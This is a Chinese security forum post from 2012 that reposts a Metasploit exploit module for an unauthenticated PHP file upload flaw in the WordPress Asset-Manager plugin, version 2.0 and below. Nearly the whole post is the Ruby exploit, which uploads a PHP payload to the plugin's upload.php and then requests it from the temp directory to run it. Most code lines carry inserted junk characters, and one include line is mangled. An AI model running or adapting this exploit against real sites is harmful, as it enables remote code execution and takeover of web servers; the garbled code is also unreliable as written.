找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2002|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
! M8 Q3 X# M$ t! w% }, E
1 G2 X, D0 M9 B& A) ^# V- y0 l##* a& P' j3 E  w/ t
# This file is part of the Metasploit Framework and may be subject to
" K" }1 L/ ]3 @# redistribution and commercial restrictions. Please see the Metasploit8 k1 W4 b3 Y# p4 c
# Framework web site for more information on licensing and terms of use.  p- k% V( E' ~+ s
#   http://metasploit.com/framework/
; [( y5 `& p. o( u9 g' Q+ C##
0 ?; j: b1 }. \) A, p3 H
2 K4 y; ^) t9 Drequire 'msf/core'" ^, K' g, f- l* {: h
require 'msf/core/exploit/php_exe'
: J# Y  ?8 C9 v8 n
, k- M  z1 w6 R" b1 N) V  Bclass Metasploit3 < Msf::Exploit::Remote
9 A) ?6 C; i( n& p  Rank = ExcellentRanking; c$ Y$ X  t3 n+ Z' k" X

  O  J& X# y* \1 a  include Msf::Exploit::Remote::HttpClient
% p& `  t7 V8 E, _  include Msf::Exploit:hpEXE7 \8 v) R( R; X7 e: j* G

  ^0 Z. B+ r& g% ~$ S5 |# F  def initialize(info = {})  G. b$ x& J/ m% w- P6 l
    super(update_info(info,
1 n: U. M2 z. j      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',7 J. M( \6 q; X  u+ }
      'Description'    => %q{
: f9 a  s5 W, z& d* D        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
$ g- X* A7 H+ ~5 o* A        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
7 ]/ M- i8 [" s        temp directory without authentication, which results in arbitrary code execution.
9 V" V% _$ n3 |- U      },
1 s- L- x0 P0 ]8 n      'Author'         =>
8 J5 G# C2 ]6 Q        [
! o- V5 G1 \  N* f. Y          'Sammy FORGIT', # initial discovery
) [+ L0 z( A5 j+ x2 v          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
( O3 D# e2 ^0 ]* f& h- P        ],& m$ |6 g7 E' S+ @
      'License'        => MSF_LICENSE,
3 e. D/ b' J# s, Y+ O: f, |5 E      'References'     =>. i6 ~& a: Z  Q8 D
        [3 g) b5 m" Z  v$ J- H* f+ Q& C
          [ 'OSVDB', '82653' ],
5 `; w5 Y: v+ }6 k0 Y          [ 'BID', '53809' ],: u; x9 D9 c! ~) w& u
          [ 'EDB', '18993' ],
; i- Y. U2 f$ o" x/ `5 V          [ 'URL', 'http:// www.myhack58.com /' ]" b7 R, m5 h6 U' ~7 y2 Q
        ],9 `+ r8 u" G8 b6 H3 e
      'Payload'       =>
) d9 R8 _  r4 C) x1 w        {
% V8 Q) w/ l* X% r          'BadChars' => "\x00",
$ |1 \9 ?2 S6 m, O& p- d$ d0 t        },* R) z( @: U2 X4 K
      'Platform'       => 'php',. W9 }8 C8 }3 v) M3 G
      'Arch'           => ARCH_PHP,
. }- |# M7 e4 `      'Targets'        =>; T4 u# s0 q8 q: W# Z
        [- Y, \0 [6 D: g* I; c! X
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
, r1 ?8 |& \" t4 p( `: Z, b          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
3 G8 c" Z  u( j8 [& R5 @0 a+ q( p        ],
/ D) V4 y( d( x1 b1 W; v+ ~1 h      'DefaultTarget' => 0,  p/ \, g: T, z1 Z  S
      'DisclosureDate' => 'May 26 2012'))
! k5 A5 y, H( {7 d9 X8 \; t1 h5 u ! b& n% u, `8 f2 A
    register_options(' x3 X0 J' w. q( Y, Z5 [8 e
      [2 _% V$ S5 ^( ?
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
" Y: w: z  P" S0 r      ], self.class)
/ K3 h5 Y: D4 ^; S$ L5 P  end
, E2 x( G  i$ d$ o7 p" k# h
0 m: c: M' q- N: M  def exploit
* M! ^3 W9 Y+ r8 B    uri =  target_uri.path
/ R" ~4 \  D+ G+ x    uri << '/' if uri[-1,1] != '/'
% V4 ?3 w, X, D& _    peer = "#{rhost}:#{rport}"
& M( Y( f$ s0 l, l' ]8 s+ I9 w4 a    payload_name = "#{rand_text_alpha(5)}.php"
3 |3 n4 }7 n( M9 y% y+ V. E$ Y( |    php_payload = get_write_exec_payload(:unlink_self=>true)( |2 v/ ?8 ~  j2 y7 A* G+ X# r) }

1 a" k. |2 o! l) N' K    data = Rex::MIME::Message.new3 }" P! W3 L& J1 q4 m4 ^
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\""). s6 E! t! C$ E& |. D' o
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
4 J( z' R7 B1 z. A ; c5 ^$ \. h# _+ E) }1 `
    print_status("#{peer} - Uploading payload #{payload_name}")
/ M' C3 f* |) X& f3 i    res = send_request_cgi({
; E  ]  y6 d7 `$ e      'method'  => 'POST',
0 \0 u3 B8 R# m  o* B5 c" S      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
2 P& o7 m# ~, I9 Q$ J, o4 V      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
1 H' @  V2 ^* \      'data'    => post_data
% |6 \6 G+ M# {' y4 J6 k. i" N    })
& T8 A6 z5 x1 P0 |' K 5 u3 A2 l- l8 n1 m4 ?, N; z
    if not res or res.code != 200 or res.body !~ /#{payload_name}/6 G1 ?& K4 n4 p8 M/ a
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
! g' R/ K# W- A) {! Cend3 v& S9 f- n) U) t; p5 h
/ k' L5 O+ D! n% q; m+ c
    print_status("#{peer} - Executing payload #{payload_name}")! G  l) N% G  i' q; Q5 q
    res = send_request_raw({2 f6 B9 C" s7 \3 ~9 L1 m: o; `5 b
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",. X' J8 J$ c$ e
      'method'  => 'GET'
7 E6 l+ w( R4 G" W    })' e+ `7 s2 V, Z
8 @' N; B  l1 Q
    if res and res.code != 200
: X/ x! f# Q8 c! ~6 o* `1 l0 ?      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
, o" S' b+ \: N. \- O    end
, j* b& M' D6 r6 X' F  end4 o3 V; ^: z+ f7 y6 v' J/ m
end: @+ I6 \1 ~5 c) U- O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表